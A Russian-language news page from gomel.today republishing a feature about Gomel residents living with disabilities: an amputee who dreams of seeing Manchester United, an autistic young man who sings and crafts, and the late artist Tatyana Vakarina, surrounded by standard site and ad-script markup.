<p><strong><img src="https://newsgomel.by/upload/sotbit.htmleditoraddition/c30/c306f1997c47a32c6f8108d16f278882.jpg" style="width:740px;height:493px"><br></strong></p><p><strong>Всего несколько лет назад жизнь Павла СИЛКОВИЧА не&nbsp;то&nbsp;чтобы совсем отличалась от&nbsp;той, которой он&nbsp;живёт сегодня, и&nbsp;всё&nbsp;же была другой. Парень учился, работал, занимался спортом. Но&nbsp;в&nbsp;один момент всё изменилось. </strong></p>
<p>Это произошло ночью. Павел в&nbsp;то&nbsp;время учился на&nbsp;повара и&nbsp;подрабатывал на&nbsp;автомойке. Когда загоняли машину в&nbsp;бокс, автомобилем его прижало к&nbsp;стене. Молодой человек получил тяжелейшие переломы обеих ног, одну из&nbsp;них во&nbsp;избежание гангрены пришлось ампутировать. </p>
<p>—&nbsp;Конечно, немного погрустил, когда в&nbsp;реанимации лежал, а&nbsp;потом сказал себе: «Слава Богу, что жив остался». Да, я&nbsp;не&nbsp;смогу какие-то свои любимые вещи делать, допустим, в&nbsp;футбол поиграть или потанцевать так, как раньше,&nbsp;— рассказал нам Паша, но&nbsp;спустя секунду улыбнулся&nbsp;— искренне, по-доброму. И&nbsp;уже безо всякой грусти в&nbsp;глазах повторил: —&nbsp;Главное, что жив... </p>
<p>Молодой человек упражняется на&nbsp;брусьях, играет в&nbsp;бильярд. Помощи не&nbsp;просит. Однако нам Паша всё-таки признался&nbsp;— есть у&nbsp;него две давние мечты.</p>
<p>—&nbsp;Очень люблю футбол,&nbsp;— Паша указал на&nbsp;футболку с&nbsp;логотипом любимой команды. —&nbsp;С&nbsp;детства болею за&nbsp;«Манчестер Юнайтед», хотелось&nbsp;бы побывать на&nbsp;матче этой команды. И&nbsp;ещё... Всегда мечтал побродить по&nbsp;Петербургу. Ни&nbsp;разу там не&nbsp;был. </p>
<p>Что&nbsp;ж, мечты имеют свойство сбываться. Особенно такие, как у&nbsp;Павла&nbsp;— добрые и&nbsp;светлые.</p>
<h2>ТВОРЧЕСТВО</h2>
<p><strong><img src="https://newsgomel.by/upload/sotbit.htmleditoraddition/875/875429d5dc69d4eab1db9b69bea8b2a0.jpg" style="width:740px;height:493px"><br></strong></p><p><strong>Александр ШИЛЬКО почти никогда и&nbsp;ни&nbsp;с&nbsp;кем не&nbsp;говорит, живя в&nbsp;своём особом, непонятном нам мире. У&nbsp;него аутизм. Даже родные и&nbsp;близкие редко слышат Сашин голос... Разве только в&nbsp;те&nbsp;минуты, когда он&nbsp;начинает петь или читать стихи. </strong></p>
<p>Молодой человек обожает выступать перед публикой и&nbsp;только в&nbsp;моменты, когда открывается занавес, его таланты раскрываются, как цветы весной. Зрители не&nbsp;могут скрыть эмоций, когда звучит в&nbsp;его исполнении: «Берега, берега, берег этот и&nbsp;тот, между ними река моей жизни...», и&nbsp;одаривают Сашу бурными аплодисментами. </p>
<p>А&nbsp;ещё он&nbsp;плетёт из&nbsp;бисера, вышивает, шьёт куклы Тильды. Одним словом, просто талантище! </p>
<p>Александр пунктуален, хорошо ориентируется в&nbsp;городе, ему можно доверить любое дело и&nbsp;не&nbsp;беспокоиться&nbsp;— он&nbsp;не&nbsp;подведёт.</p>
<h2>ПАМЯТЬ</h2>
<p><strong><img src="https://newsgomel.by/upload/sotbit.htmleditoraddition/bc4/bc478d4ee8e97436563fc7d1582e7e69.jpg" style="width:740px;height:490px"><br></strong></p><p><strong>Татьяна ВАКАРИНА... У&nbsp;неё была миопатия&nbsp;— неизлечимое заболевание опорно-двигательного аппарата. Однако наперекор своему недугу она могла наполнять мир вокруг себя светлыми красками и&nbsp;гармонией.</strong></p>
<p>Рисовать Таня начала с&nbsp;детства. В&nbsp;2005 году стала призёром международного фестиваля творчества инвалидов России и&nbsp;Беларуси в&nbsp;Смоленске. В&nbsp;Гомеле были организованы три её&nbsp;персональные выставки. Работы художницы оценили в&nbsp;Германии и&nbsp;во&nbsp;Франции.</p>
<p>Красота природы, завораживающий мир балета, пластика движений&nbsp;— основные сюжеты произведений художницы. Сколько упорства, труда и&nbsp;любви вложено в&nbsp;каждую картину. «Приносить радость людям, дарить тепло и&nbsp;красоту через искусство»&nbsp;— с&nbsp;этим кредо Танечка жила, с&nbsp;ним и&nbsp;покинула нашу большую Вселенную, уйдя в&nbsp;другую, в&nbsp;свою, «Маленькую Вселенную Тани Вакариной»...</p>
			<br><br>
			<!-- InPage -->
			<div id="inpage_VI-276906-0"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: 'VI-276906-0',
                renderTo: 'inpage_VI-276906-0',
                inpage: {
                    /* Впишите дополнительные параметры */
                },
            }, function callback (params) {
                // callback
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>
		</div>
		<br>
		<div class="source-news"> 
			Ольга Астапенко, фото: Анна Пащенко, Ирина Чернявская и из архивов героев, <a href='https://newsgomel.by/news/society/ne-sdayutsya-mechtayut-tvoryat-podborka-trogatelnykh-istoriy-gomelchan-dlya-kotorykh-invalidnost-ne-.html' target='_blank'>Гомельские ведомости</a> 
		</div>
</article>			
<div class="mods-news-text">
	<!-- Баннер №4 -->
		

					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=588" class="banner_max_width"><img style="width:100%" src="/modules/media/files/9231____________________________740__90.jpg" alt="ДОСТАВКА : " border="0" /></a>
				
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=588" class="banner_middle_width"><img style="width:100%" src="/modules/media/files/9231____________________________740__90.jpg" alt="ДОСТАВКА : " border="0" /></a>
				
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=588" class="banner_small_width"><img style="width:100%" src="/modules/media/files/9231____________________________740__90.jpg" alt="ДОСТАВКА : " border="0" /></a>
				</div>
<div class="mods-news-text"><tqwgtplaceholder holdername="embedded_1531996220320"></tqwgtplaceholder></div>
<div>
	<div class="teleg">Мы создали канал в Телеграме для того, чтобы быстро рассказывать вам новости → <a href="https://t.me/gomeltoday" target="_blank">https://t.me/gomeltoday</a>		</div>
</div>
<div class="mods-news-text">
	<noindex>
		<div>
			<script src="//yastatic.net/es5-shims/0.0.2/es5-shims.min.js"></script>
			<script src="//yastatic.net/share2/share.js"></script>
				<div class="ya-share2" data-services="vkontakte,facebook,odnoklassniki,twitter,viber,telegram,skype" data-counter="">
				</div>	
		</div>		
	</noindex>
</div>
<div>
     <div style="display: inline-block; margin: 0px 10px 10px 0px;"><a href="https://telegram.me/gomeltoday" target="_blank"><img src="/uploads/images/teleg_read.jpg"></a></div>
     <div style="display: inline-block; margin: 10px 10px 10px 0px;"><a href="https://vk.com/gomeltoday" target="_blank"><img src="/uploads/images/vk_read.jpg"></a></div>
	<div style="display: inline-block; margin: 10px 0px 10px 0px;"><a href="https://www.instagram.com/gomeltoday/" target="_blank"><img src="/uploads/images/insta_read.jpg"></a></div>
</div>
<div class="mods-news-text">
	<!-- Yandex.RTB R-A-150149-8 -->
		<div id="yandex_rtb_R-A-150149-8">
		</div>
		<script type="text/javascript">
    	(function(w, d, n, s, t) {
        	w[n] = w[n] || [];
        	w[n].push(function() {
            	Ya.Context.AdvManager.render({
                	blockId: "R-A-150149-8",
                	renderTo: "yandex_rtb_R-A-150149-8",
                	horizontalAlign: true,
               		async: true
            	});
        	});
        	t = d.getElementsByTagName("script")[0];
        	s = d.createElement("script");
        	s.type = "text/javascript";
        	s.src = "//an.yandex.ru/system/context.js";
        	s.async = true;
        	t.parentNode.insertBefore(s, t);
    		})(this, this.document, "yandexContextAsyncCallbacks");
		</script>
</div>	
<div id='admixer_23d1f7acc3764ade8e807a0d1a40362b_zone_9089_sect_2479_site_2247'></div>
<script type='text/javascript'>
    admixerML.fn.push(function() {
admixerML.display('admixer_23d1f7acc3764ade8e807a0d1a40362b_zone_9089_sect_2479_site_2247');
});
</script><!-- БЛОК -->
<div class="mods-news-text">
		<p><b>Места:</b> <a class="black" href="/key/place/Гомель">Гомель</a> (24629)</p>	<p><b>Метки:</b> <a class="black" href="/key/tag/Общество">Общество</a> (33110)</p></div>


<div class="mods-news-text">
	<div class="grey_title close_mobile">
		Комментарии <abbr title="В комментариях под новостями запрещены и подпадают под удаление:

1. Нецензурная лексика
2. Оскорбление других читателей и сотрудников редакции
3. Спам
4. Оффтоп
5. Хронический троллинг
6. Комментирование с фейковых аккаунтов
7. Язык ненависти, разжигание розни по любому признаку
8. Любые комментарии, нарушающие законодательство Республики Беларусь
9. Администрация оставляет за собой право удалить любой комментарий без объяснения причин"><small><u>правила</u></small></abbr>
	</div>
	<div class="grey_body close_mobile">	
		 
		
	</div>
	
	
	

	<a id="end"></a>

			<p class="user-get-login-comment">Чтобы оставить комментарий, пожалуйста, пройдите авторизацию через предложенные соцсети. Для этого нажмите на иконку ниже.</p>
	
<div class="margin-top-20 margin-bottom-20">
					<script src="//ulogin.ru/js/ulogin.js"></script>
			<div id="uLogin" data-ulogin="display=panel;theme=flat;fields=first_name,last_name,email,photo;providers=vkontakte,odnoklassniki,facebook;redirect_uri=%2F%2Fgomel.today%2Findex.php%3Fmodule%3Dlogin%26action%3Dauth%26page%3DaW5kZXgucGhwP2lkPTExMzM3NiZkb2M9cnVzL25ld3MvZ29tZWwtMTE3ODI%3D;mobilebuttons=0;">				
			</div>
			</div>

	
	<br><br>
	<!-- Yandex.RTB R-A-150149-15
<div id="yandex_rtb_R-A-150149-15"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-150149-15",
                renderTo: "yandex_rtb_R-A-150149-15",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>  -->
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-4199418862563420"
     data-ad-slot="3849893488"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
	<br><br>
	<!-- Партнеры--><div class="mods-news-text">	
		<div id="M357979ScriptRootC673237"  style="margin-top: -50px !important;">
				<div id="M357979PreloadC673237">
				Загрузка...    </div>
				<script>
						(function(){
					var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById',lp=d.location.protocol,wp=lp.indexOf('http')==0?lp:'https:';
					var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M357979ScriptRootC673237")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
					catch(e){var iw=d;var c=d[gi]("M357979ScriptRootC673237");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=673237;c[ac](dv);
					var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src=wp+"//jsc.lentainform.com/g/o/gomel.today.673237.js?t="+D.getYear()+D.getMonth()+D.getUTCDate()+D.getUTCHours();c[ac](s);})();
			</script>
		</div>		
</div>
	<!-- Yandex.RTB R-A-150149-15
<div id="yandex_rtb_R-A-150149-15"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-150149-15",
                renderTo: "yandex_rtb_R-A-150149-15",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>  -->
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-4199418862563420"
     data-ad-slot="3849893488"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>
					</div>
					<div class="col-md-4">				
						 
				<br> <!-- <div id='admixer_3e3d8d76026c4d53ac806ab6168fb68a_zone_9088_sect_2479_site_2247'></div> <script type='text/javascript'> admixerML.fn.push(function() { admixerML.display('admixer_3e3d8d76026c4d53ac806ab6168fb68a_zone_9088_sect_2479_site_2247'); }); </script> -->

		<div style="width:240px; margin:auto;">
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=595" class="banner_max_width"><img style="width:100%" src="/modules/media/files/banner240__400.gif" alt="Марафон 19/01 - : " border="0" /></a>
				
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=595" class="banner_middle_width"><img style="width:100%" src="/modules/media/files/banner240__400.gif" alt="Марафон 19/01 - : " border="0" /></a>
				
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=595" class="banner_small_width"><img style="width:100%" src="/modules/media/files/banner240__400.gif" alt="Марафон 19/01 - : " border="0" /></a>
				</div> 
						
						<!-- <div class="most_read most_comment article_comment article_left_block"><h4>Самое обсуждаемое</h4><ul class="list-unstyled"><li ><div class="pull-left"><i class="sprite comment"></i> 3</div><p><a href="/rus/news/belarus-9366/" title="«Ситуация катастрофическая». ИП передали президенту обращение почти с 7 тысячами подписей">«Ситуация катастрофическая». ИП передали президенту обращение почти с 7 тысячами подписей</a></p></li><li ><div class="pull-left"><i class="sprite comment"></i> 3</div><p><a href="/rus/news/belarus-9374/" title="Хирургу — 1200 рублей, медсестре — 900. В Минздраве рассказали, как у медиков выросли зарплаты">Хирургу — 1200 рублей, медсестре — 900. В Минздраве рассказали, как у медиков выросли зарплаты</a></p></li><li ><div class="pull-left"><i class="sprite comment"></i> 2</div><p><a href="/rus/news/belarus-9348/" title="Белорус 10 лет платил алименты за троих детей от другого мужчины, а когда перестал, бывшая жена обратилась в милицию. Все решила экспертиза ДНК">Белорус 10 лет платил алименты за троих детей от другого мужчины, а когда перестал, бывшая жена обратилась в милицию. Все решила экспертиза ДНК</a></p></li><li ><div class="pull-left"><i class="sprite comment"></i> 2</div><p><a href="/rus/news/gomel-11777/" title="Контролеры проверили в Гомеле торговую сеть «Два Гуся» и нашли немало нарушений">Контролеры проверили в Гомеле торговую сеть «Два Гуся» и нашли немало нарушений</a></p></li><li ><div class="pull-left"><i class="sprite comment"></i> 1</div><p><a href="/rus/news/belarus-9345/" title="В белорусских школах будут рассказывать, «как выбрать будущего супруга»">В белорусских школах будут рассказывать, «как выбрать будущего супруга»</a></p></li><li ><div class="pull-left"><i class="sprite comment"></i> 1</div><p><a href="/rus/news/belarus-9346/" title="В Минске начали судить главного патологоанатома Минздрава, который прятал взятку в холодильнике">В Минске начали судить главного патологоанатома Минздрава, который прятал взятку в холодильнике</a></p></li><li ><div class="pull-left"><i class="sprite comment"></i> 1</div><p><a href="/rus/news/belarus-9347/" title="В Гданьске трое украинцев порезали белоруса, он в больнице">В Гданьске трое украинцев порезали белоруса, он в больнице</a></p></li></ul></div> -->
						<div class="most_read most_comment article_comment article_left_block">
	<h4>Новости партнеров</h4>
		<div id="M357979ScriptRootC673093"  style="margin-top: -50px !important;">
        <div id="M357979PreloadC673093">
        Загрузка...    </div>
        <script>
                (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById',lp=d.location.protocol,wp=lp.indexOf('http')==0?lp:'https:';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M357979ScriptRootC673093")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("M357979ScriptRootC673093");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=673093;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src=wp+"//jsc.lentainform.com/g/o/gomel.today.673093.js?t="+D.getYear()+D.getMonth()+D.getUTCDate()+D.getUTCHours();c[ac](s);})();
		</script>
		</div>
</div>
						<br>
						<div id='admixer_3e3d8d76026c4d53ac806ab6168fb68a_zone_9088_sect_2479_site_2247'></div> <script type='text/javascript'> admixerML.fn.push(function() { admixerML.display('admixer_3e3d8d76026c4d53ac806ab6168fb68a_zone_9088_sect_2479_site_2247'); }); </script>
						<br>
						
						
						<div class="most_read last_blog article_left_block"><a href="/blogs" target="_blank"><h4>Новое в блогах</h4></a><ul class="list-unstyled"><li class="text-danger"><img src="/uploads/avatar/f_dfa2cc6df75452fedac37243bbe632a244.jpg" class="img-responsive pull-left"><div class="desc"><ul class="list-inline small-desc"><li class="date">22 января 2019</li><li class="comment"><i class="sprite scomment"></i> 0</li></ul><div class="author">Общество Гомель</div><a href="/113249/">2019 Кто не спонсирует Лукашенко - тот тунеядец. Ко мне пришла комиссия/Общество Гомель</a></div></li><li class="text-danger"><img src="/uploads/avatar/f_66fd8aa38882f12ffc2ba1013a9f63f018.jpg" class="img-responsive pull-left"><div class="desc"><ul class="list-inline small-desc"><li class="date">21 января 2019</li><li class="comment"><i class="sprite scomment"></i> 0</li></ul><div class="author">Яўген Меркіс</div><a href="/113203/">Новы падземны пераход у Гомелі за мільён даляраў? Дзякуй, не трэба!</a></div></li><li class="text-danger"><img src="/uploads/avatar/f_66fd8aa38882f12ffc2ba1013a9f63f018.jpg" class="img-responsive pull-left"><div class="desc"><ul class="list-inline small-desc"><li class="date">20 января 2019</li><li class="comment"><i class="sprite scomment"></i> 0</li></ul><div class="author">Яўген Меркіс</div><a href="/113176/">Шчодры ў Гомелі вачыма ўдзельніка</a></div></li><li class="text-danger"><img src="/uploads/avatar/f_5b40d5031729f6c19797a009b8fbd7b936.jpg" class="img-responsive pull-left"><div class="desc"><ul class="list-inline small-desc"><li class="date">19 января 2019</li><li class="comment"><i class="sprite scomment"></i> 0</li></ul><div class="author">Наташа Богданова</div><a href="/113150/">Лукашенко настигла Карма! (Новости года)</a></div></li><li class="text-danger"><img src="/uploads/avatar/f_dfa2cc6df75452fedac37243bbe632a244.jpg" class="img-responsive pull-left"><div class="desc"><ul class="list-inline small-desc"><li class="date">18 января 2019</li><li class="comment"><i class="sprite scomment"></i> 0</li></ul><div class="author">Общество Гомель</div><a href="/113131/">ЖИТЬ БУДЕМ ПЛОХО НО НЕДОЛГО ГОМЕЛЬОБОИ/Общество Гомель</a></div></li></ul></div>	
						
						<!-- Баннер №5 -->
						<br><div style="margin:auto; width:240px;">
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=602" class="banner_max_width"><img style="width:100%" src="/modules/media/files/61579__ksk_gt240x400.gif" alt="KSK 25/01 (15:00) - 27/01 (19:59) : " border="0" /></a>
				
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=602" class="banner_middle_width"><img style="width:100%" src="/modules/media/files/61579__ksk_gt240x400.gif" alt="KSK 25/01 (15:00) - 27/01 (19:59) : " border="0" /></a>
				
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=602" class="banner_small_width"><img style="width:100%" src="/modules/media/files/61579__ksk_gt240x400.gif" alt="KSK 25/01 (15:00) - 27/01 (19:59) : " border="0" /></a>
				</div>
															
						<div class="most_read most_comment article_comment"><h4>Самое читаемое</h4><ul class="list-unstyled"><li ><div class="pull-left"> 24.01<br>2019</div><p><a href="/rus/news/world-4263/" title="Басков откровенно о сексе с Волочковой и Лопыревой">Басков откровенно о сексе с Волочковой и Лопыревой</a></p></li><li ><div class="pull-left"> 21.01<br>2019</div><p><a href="/rus/news/gomel-11746/" title="Аня пришла в себя, Маша — в коме. Что известно о состоянии сбитых на переходе в Гомеле близняшек">Аня пришла в себя, Маша — в коме. Что известно о состоянии сбитых на переходе в Гомеле близняшек</a></p></li><li ><div class="pull-left"> 22.01<br>2019</div><p><a href="/rus/news/gomel-11755/" title="Сходить в баню и умереть. В Гомеле скончался мужчина, неудачно прыгнувший в бассейн после парилки">Сходить в баню и умереть. В Гомеле скончался мужчина, неудачно прыгнувший в бассейн после парилки</a></p></li><li ><div class="pull-left"> 24.01<br>2019</div><p><a href="/rus/news/gomel-11777/" title="Контролеры проверили в Гомеле торговую сеть «Два Гуся» и нашли немало нарушений">Контролеры проверили в Гомеле торговую сеть «Два Гуся» и нашли немало нарушений</a></p></li><li ><div class="pull-left"> 23.01<br>2019</div><p><a href="/rus/news/gomel-11761/" title="«И началась бойня». Подробности суда над гомельчанином, который устроил резню в троллейбусе и ранил трех милиционеров">«И началась бойня». Подробности суда над гомельчанином, который устроил резню в троллейбусе и ранил трех милиционеров</a></p></li><li ><div class="pull-left"> 19.01<br>2019</div><p><a href="/rus/news/gomel-11734/" title="«Тайна числа 666». На праздновании Крещения в гомельском парке мужчина раздавал сомнительные листовки. Прохожие пожаловались омоновцам">«Тайна числа 666». На праздновании Крещения в гомельском парке мужчина раздавал сомнительные листовки. Прохожие пожаловались омоновцам</a></p></li><li ><div class="pull-left"> 19.01<br>2019</div><p><a href="/rus/article/society-1028/" title="Интернет помнит все — почему стоит пять раз подумать перед тем, как делиться в сети своими фото">Интернет помнит все — почему стоит пять раз подумать перед тем, как делиться в сети своими фото</a></p></li></ul></div>						<!-- Баннер горсобраний -->
						<br><br>
						<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
						<ins class="adsbygoogle"
							 style="display:block"
							 data-ad-client="ca-pub-4199418862563420"
							 data-ad-slot="4341639388"
							 data-ad-format="auto"></ins>
						<script>
						(adsbygoogle = window.adsbygoogle || []).push({});
						</script>
						
					</div>
				</div>
				<div style="margin:10px 0;" class="container">
	</div>

				
				<!-- Партнеры --><div class="list-news">
	<h2>Новости партнеров</h2>
	<div id="M357979ScriptRootC673119" style="margin-top: -50px !important;">
			<div id="M357979PreloadC673119">
			Загрузка...    </div>
			<script>
					(function(){
				var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById',lp=d.location.protocol,wp=lp.indexOf('http')==0?lp:'https:';
				var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M357979ScriptRootC673119")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
				catch(e){var iw=d;var c=d[gi]("M357979ScriptRootC673119");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=673119;c[ac](dv);
				var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src=wp+"//jsc.lentainform.com/g/o/gomel.today.673119.js?t="+D.getYear()+D.getMonth()+D.getUTCDate()+D.getUTCHours();c[ac](s);})();
			</script>
	</div>
</div>

<br><br>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Блок под партнерами -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-4199418862563420"
     data-ad-slot="7187455882"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>

<!-- Yandex.RTB R-A-150149-27 
<div id="yandex_rtb_R-A-150149-27"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-150149-27",
                renderTo: "yandex_rtb_R-A-150149-27",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script> -->
				
				<aside class="list-news news-last">
	<h2>последние Новости</h2>
	<div class="row">
		<div class="col col-md-4">
	<img src="/uploads/News/2019/01/25/614-nalogi.jpg" class="img-responsive">
	<ul class="list-inline small-desc">
		<li class="date">25 января 2019</li>
		<li class="view"><i class="sprite sview"></i> 67</li>
		<li class="comment"><i class="sprite scomment"></i> 0</li>
	</ul>
	<h3><a href="/rus/news/gomel-11792/">Гомельский строительно-монтажный трест более 10 лет не платил налог за административное здание</a></h3>
	<p>
		Комитет госконтроля Гомельской области при проведении контрольно-аналитических мероприятий установил, что ОАО «Строительно-монтажный трест №&nbsp;27» в&nbsp;Гомеле более 10&nbsp;лет не&nbsp;вовлекал в... 
	</p>
</div><div class="col col-md-4">
	<img src="/uploads/News/2019/01/25/613-ea.jpg" class="img-responsive">
	<ul class="list-inline small-desc">
		<li class="date">25 января 2019</li>
		<li class="view"><i class="sprite sview"></i> 264</li>
		<li class="comment"><i class="sprite scomment"></i> 0</li>
	</ul>
	<h3><a href="/rus/news/gomel-11791/">ЧП на заводе «Электроаппаратура» — молодой штамповщице размозжило кисть руки</a></h3>
	<p>
		Инцидент произошел 23&nbsp;января.
	</p>
</div><div class="col col-md-4">
	<img src="/uploads/News/2019/01/25/514-agl.jpg" class="img-responsive">
	<ul class="list-inline small-desc">
		<li class="date">25 января 2019</li>
		<li class="view"><i class="sprite sview"></i> 57</li>
		<li class="comment"><i class="sprite scomment"></i> 0</li>
	</ul>
	<h3><a href="/rus/news/belarus-9397/">Лукашенко о коррупции в медицине: прощения врачам здесь не будет, забудьте о своей корпоративности</a></h3>
	<p>
		Президент Беларуси Александр Лукашенко подчеркивает недопустимость коррупции в&nbsp;медицине и&nbsp;предупреждает, что прощения даже врачам за&nbsp;подобные правонарушения не&nbsp;будет. Об&nbsp;этом ... 
	</p>
</div><div class="col col-md-4">
	<img src="/uploads/News/2019/01/25/612-sekret.jpg" class="img-responsive">
	<ul class="list-inline small-desc">
		<li class="date">25 января 2019</li>
		<li class="view"><i class="sprite sview"></i> 275</li>
		<li class="comment"><i class="sprite scomment"></i> 0</li>
	</ul>
	<h3><a href="/rus/news/gomel-11790/">Предприниматели Гомеля пожаловались на защитников прав потребителей</a></h3>
	<p>
		Они считают, что «Защита прав потребителей» зарабатывает на&nbsp;предпринимателях деньги, используя защиту потребителя только как повод.... 
	</p>
</div><div class="col col-md-4">
	<img src="/uploads/News/2019/01/25/611-sobaka.jpg" class="img-responsive">
	<ul class="list-inline small-desc">
		<li class="date">25 января 2019</li>
		<li class="view"><i class="sprite sview"></i> 119</li>
		<li class="comment"><i class="sprite scomment"></i> 0</li>
	</ul>
	<h3><a href="/rus/news/belarus-9396/">В Могилеве кто-то жестоко расправился со щенком и оставил труп на дереве (осторожно, жесткое фото!)</a></h3>
	<p>
		В&nbsp;Могилеве неизвестные убили собаку и&nbsp;оставили ее&nbsp;подвешенной на&nbsp;дереве в&nbsp;людном месте. «Труп висит уже третьи сутки»,&nbsp;— рассказала TUT.BY Инна Хитрикова, сын которой обн... 
	</p>
</div><div class="col col-md-4">
	<img src="/uploads/News/2019/01/25/909-konoplia.jpg" class="img-responsive">
	<ul class="list-inline small-desc">
		<li class="date">25 января 2019</li>
		<li class="view"><i class="sprite sview"></i> 288</li>
		<li class="comment"><i class="sprite scomment"></i> 0</li>
	</ul>
	<h3><a href="/rus/news/belarus-9394/">В Беларуси запретили изображения конопли</a></h3>
	<p>
		Суд Центрального района Минска принял решение по&nbsp;делу кампании Legalize Belarus против Министерства информации Беларуси. В&nbsp;ходе слушаний выяснилось, что на&nbsp;территории страны запрещены и... 
	</p>
</div>		
	</div>
</aside>
				
				<!-- Redtrum --><div class="list-news">
	<h2>Новости партнеров</h2>
<script class="r20422" type="text/javascript">
    (function() {
        var worker20422,
            tickerID = 20422,
            tag = document.currentScript || (function() {
                var scripts = document.getElementsByClassName('r20422'),
                    len = scripts.length;
                return len ? scripts[len - 1] : null;
            })(),
            idn = (function() {
                var i, num, chars = "abcdefghiklmnopqrstuvwxyz",
                    len = Math.floor((Math.random() * 2) + 4),
                    idn = '';
                for (i = 0; i < len; i++) {
                    num = Math.floor(Math.random() * chars.length);
                    idn += chars.substring(num, num + 1);
                }
                return idn;
            })();
        
        var container = document.createElement('div');
            container.id = idn;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.setAttribute('class', 's20422');
            script.setAttribute('data-idn', idn);
            script.src = '//js-goods.redtram.com/0/20/ticker_20422.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

